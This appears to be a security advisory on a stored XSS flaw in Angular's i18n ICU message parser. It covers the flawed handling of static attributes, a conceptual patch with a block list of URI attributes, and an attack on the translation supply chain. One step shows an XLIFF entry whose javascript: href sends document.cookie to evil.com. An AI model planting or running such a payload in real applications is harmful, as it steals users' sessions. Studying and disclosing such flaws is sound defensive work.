Angular i18n Pipeline: Stored XSS via Malicious ICU Message Attributes

Angular's internationalization (i18n) system relies on a build-time or runtime process where source messages are extracted from templates, translated into target languages (stored in formats like XLIFF or XTB), and then merged back into the application. A critical component of this system is the handling of ICU (International Components for Unicode) expressions, which allow for complex pluralization and selection logic within text strings.

When Angular processes these translated messages, it parses the ICU structure to generate the corresponding DOM elements. Unlike standard template HTML, which passes through Angular's rigorous compiler sanitization, ICU messages are processed by a specialized parser located in packages/core/src/render3/i18n/i18n_parse.ts. This parser is responsible for interpreting the structure of the message and creating the necessary text nodes and elements dynamically.

The vulnerability resides in the walkIcuTree function, specifically in how it differentiates between 'dynamic' and 'static' content. The Angular security model typically treats all input as untrusted unless explicitly marked otherwise. However, the i18n parser implemented a flawed heuristic: it assumed that if an attribute within an ICU message did not contain a dynamic binding (e.g., {{ value }}), it was inherently safe.

This assumption creates a logic gap. While static attributes do not introduce template injection risks (accessing internal component state), they can still introduce HTML injection risks if they contain malicious attribute values. The parser would identify these static attributes and pass them directly to the addCreateAttribute instruction without validating the attribute name or sanitizing the value. Consequently, an attribute like href="javascript:alert(1)" was treated as a harmless static string and rendered into the DOM, bypassing the framework's trusted types and sanitization layers.

The remediation introduces a strict allowlist approach, replacing the previous 'allow by default' behavior for static attributes. The patch modifies the parsing logic to validate every attribute against a VALID_ATTRS set and explicitly blocks dangerous URI-based attributes.

Below is a reconstruction of the logic changes based on the patch details:

Vulnerable Logic (Conceptual):

function walkIcuTree(node) {
  // ... traversal logic
  if (node.attributes) {
    for (const attr of node.attributes) {
       // FLAW: Assumes static attributes are safe
       if (!isDynamic(attr.value)) {
         instructions.push(addCreateAttribute(attr.name, attr.value));
       }
    }
  }
}

Patched Logic (Conceptual):

const BANNED_URI_ATTRS = new Set(['href', 'src', 'xlink:href']);
 
function walkIcuTree(node) {
  // ... traversal logic
  if (node.attributes) {
    for (const attr of node.attributes) {
       // FIX 1: Check if attribute is dangerous URI sink
       if (BANNED_URI_ATTRS.has(attr.name)) {
          // Forcefully block the value
          instructions.push(addCreateAttribute(attr.name, 'unsafe:blocked'));
          continue;
       }
 
       // FIX 2: Only allow known safe attributes or strip unknowns
       if (isValidAttribute(attr.name)) {
          instructions.push(addCreateAttribute(attr.name, attr.value));
       } else {
          console.warn(`Blocked unknown attribute ${attr.name} in ICU message`);
       }
    }
  }
}

The fix ensures that even if a translator injects a javascript: payload into a href attribute, the renderer will output href="unsafe:blocked", neutralizing the XSS vector.

Exploitation of CVE-2026-27970 typically involves a supply chain attack against the translation workflow. Many organizations outsource translations or use automated localization platforms. If an attacker compromises a translator's account or the repository hosting .xlf files, they can inject malicious payloads.

Attack Steps:

1. Injection: The attacker modifies a French translation file (messages.fr.xlf) to include a malicious anchor tag inside an ICU plural expression.

   <trans-unit id="welcomeMessage">
     <source>Hello {count, plural, =0 {no one} other {everyone}}</source>
     <target>Bonjour {count, plural, =0 {personne} other {<a href="javascript:fetch('https://evil.com/'+document.cookie)">tout le monde</a>}}</target>
   </trans-unit>

2. Deployment: The application is built. The Angular compiler (or runtime) processes the corrupted XLIFF file.
3. Execution: A user selects 'French' as their language. The application renders the ICU message. Because the href attribute is static (no {{}}), the vulnerable parser permits it.
4. Trigger: The user clicks the link, executing the JavaScript payload in the context of the application origin.

This vulnerability represents a breakdown in Angular's "secure by default" promise. While Angular is famous for its strict contextual auto-escaping, this flaw allowed a bypass via the i18n subsystem.

Security Consequence:

• Cross-Site Scripting (XSS): Successful exploitation allows arbitrary JavaScript execution. This leads to session hijacking (stealing JWTs or cookies), forced actions (CSRF bypass), and potential redirection to phishing sites.
• Supply Chain Risk: This vulnerability elevates the trust requirement for translation vendors. Previously, translation files were considered data; this vulnerability effectively upgrades them to code execution vectors.

CVSS Context: While the CVSS score is High (7.6), the complexity is non-trivial because the attacker cannot usually input XLIFF data directly via a web form. They require write access to the source code repository or the translation management system (TMS). However, in environments where users contribute community translations, this becomes a critical remote exploitation vector.